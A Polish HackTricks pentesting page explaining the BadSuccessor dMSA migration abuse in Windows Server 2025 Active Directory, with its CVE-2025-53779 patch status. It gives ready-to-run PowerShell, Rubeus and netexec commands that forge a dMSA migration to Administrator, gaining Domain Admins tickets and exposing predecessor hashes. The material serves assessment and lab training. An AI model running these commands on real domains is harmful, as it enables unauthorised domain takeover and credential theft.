BadSuccessor
Tip
Ucz się i ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się i ćwicz Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Przeglądaj pełny katalog HackTricks Training dla ścieżek assessment (ARTA/GRTA/AzRTA) oraz Linux Hacking Expert (LHE).
Wsparcie HackTricks
- Sprawdź plany subskrypcji!
- Dołącz do 💬 grupy Discord, grupy telegram, obserwuj @hacktricks_live na X/Twitter, albo sprawdź stronę LinkedIn i kanał YouTube.
- Dziel się hacking tricks, wysyłając PR do repozytoriów github HackTricks i HackTricks Cloud.
Przegląd
BadSuccessor nadużywa przepływu migracji delegated Managed Service Account (dMSA) wprowadzonego w Windows Server 2025. dMSA może być powiązane ze starszym kontem przez msDS-ManagedAccountPrecededByLink i przenoszone przez stany migracji przechowywane w msDS-DelegatedMSAState. Jeśli atakujący może utworzyć dMSA w zapisywalnym OU i kontrolować te atrybuty, KDC może wystawiać bilety dla dMSA kontrolowanego przez atakującego z authorization context powiązanego konta.
W praktyce oznacza to, że użytkownik o niskich uprawnieniach, który ma tylko delegowane uprawnienia OU, może utworzyć nowe dMSA, wskazać na Administrator, zakończyć stan migracji, a następnie uzyskać TGT, którego PAC zawiera uprzywilejowane grupy, takie jak Domain Admins.
Szczegóły migracji dMSA, które mają znaczenie
- dMSA to funkcja Windows Server 2025.
Start-ADServiceAccountMigrationustawia migrację w stanie started.Complete-ADServiceAccountMigrationustawia migrację w stanie completed.msDS-DelegatedMSAState = 1oznacza rozpoczętą migrację.msDS-DelegatedMSAState = 2oznacza zakończoną migrację.- Podczas legalnej migracji dMSA ma transparentnie zastąpić wycofywane konto, więc KDC/LSA zachowują dostęp, jaki poprzednie konto już miało.
Microsoft Learn zauważa również, że podczas migracji oryginalne konto jest powiązane z dMSA, a dMSA ma uzyskiwać dostęp do tego, do czego mógł uzyskać dostęp stary konto. To właśnie założenie bezpieczeństwa nadużywa BadSuccessor.
Wymagania
- Domena, w której dMSA istnieje, co oznacza obecność wsparcia Windows Server 2025 po stronie AD.
- Atakujący może tworzyć obiekty
msDS-DelegatedManagedServiceAccountw jakimś OU albo ma równoważne szerokie uprawnienia do tworzenia obiektów potomnych w tym miejscu. - Atakujący może zapisywać odpowiednie atrybuty dMSA albo w pełni kontroluje właśnie utworzone dMSA.
- Atakujący może żądać biletów Kerberos z kontekstu dołączonego do domeny albo z tunelu, który ma dostęp do LDAP/Kerberos.
Praktyczne sprawdzenia
Najczystszym sygnałem dla operatora jest weryfikacja poziomu domeny/lasu i potwierdzenie, że środowisko już używa nowego stosu Server 2025:
Get-ADDomain | Select Name,DomainMode
Get-ADForest | Select Name,ForestMode
Jeśli widzisz wartości takie jak Windows2025Domain i Windows2025Forest, traktuj BadSuccessor / dMSA migration abuse jako priorytetowy check.
Możesz też wyliczyć writable OUs delegowane do tworzenia dMSA za pomocą public tooling:
.\Get-BadSuccessorOUPermissions.ps1
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor
Przepływ abuse
- Utwórz dMSA w OU, gdzie masz delegowane rights create-child.
- Ustaw
msDS-ManagedAccountPrecededByLinkna DN uprzywilejowanego celu, takiego jakCN=Administrator,CN=Users,DC=corp,DC=local. - Ustaw
msDS-DelegatedMSAStatena2, aby oznaczyć migrację jako zakończoną. - Zażądaj TGT dla nowego dMSA i użyj zwróconego ticketu do dostępu do uprzywilejowanych services.
Przykład PowerShell:
New-ADServiceAccount -Name attacker_dMSA -DNSHostName host.corp.local -Path "OU=Delegated,DC=corp,DC=local"
Set-ADServiceAccount attacker_dMSA -Add @{
msDS-ManagedAccountPrecededByLink="CN=Administrator,CN=Users,DC=corp,DC=local"
}
Set-ADServiceAccount attacker_dMSA -Replace @{msDS-DelegatedMSAState=2}
Przykłady żądań ticketów / narzędzi operacyjnych:
Rubeus.exe asktgs /targetuser:attacker_dMSA$ /service:krbtgt/corp.local /dmsa /opsec /nowrap /ptt /ticket:<machine_tgt>
netexec ldap <dc> -u <user> -p '<pass>' -M badsuccessor -o TARGET_OU='OU=Delegated,DC=corp,DC=local' DMSA_NAME=attacker TARGET_ACCOUNT=Administrator
Dlaczego to jest czymś więcej niż privilege escalation
Podczas legalnej migracji Windows musi też użyć nowego dMSA do obsługi ticketów, które zostały wydane dla poprzedniego konta przed cutover. Dlatego materiał ticketowy związany z dMSA może zawierać current i previous klucze w przepływie KERB-DMSA-KEY-PACKAGE.
W przypadku fałszywej migracji kontrolowanej przez atakującego to zachowanie może zamienić BadSuccessor w:
- Privilege escalation przez dziedziczenie uprzywilejowanych SID-ów grup w PAC.
- Credential material exposure ponieważ obsługa previous-key może ujawnić materiał równoważny RC4/NT hash poprzednika w podatnych workflow.
To sprawia, że technika jest przydatna zarówno do bezpośredniego przejęcia domeny, jak i do dalszych operacji, takich jak pass-the-hash lub szerszy credential compromise.
Uwagi o statusie patcha
Oryginalne zachowanie BadSuccessor to nie tylko teoretyczny problem preview z 2025. Microsoft przypisał mu CVE-2025-53779 i opublikował security update w sierpniu 2025. Zachowaj ten atak w dokumentacji dla:
- labs / CTFs / assume-breach exercises
- niezałatanych środowisk Windows Server 2025
- weryfikacji delegacji OU i ekspozycji dMSA podczas assessmentów
Nie zakładaj, że domena Windows Server 2025 jest podatna tylko dlatego, że istnieje dMSA; zweryfikuj poziom patcha i testuj ostrożnie.
Tools
References
- HTB: Eighteen
- Akamai - BadSuccessor: Abusing dMSA to Escalate Privileges in Active Directory
- Microsoft Learn - Delegated Managed Service Accounts overview
- Microsoft Security Response Center - CVE-2025-53779
Tip
Ucz się i ćwicz AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Ucz się i ćwicz GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Ucz się i ćwicz Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Przeglądaj pełny katalog HackTricks Training dla ścieżek assessment (ARTA/GRTA/AzRTA) oraz Linux Hacking Expert (LHE).
Wsparcie HackTricks
- Sprawdź plany subskrypcji!
- Dołącz do 💬 grupy Discord, grupy telegram, obserwuj @hacktricks_live na X/Twitter, albo sprawdź stronę LinkedIn i kanał YouTube.
- Dziel się hacking tricks, wysyłając PR do repozytoriów github HackTricks i HackTricks Cloud.


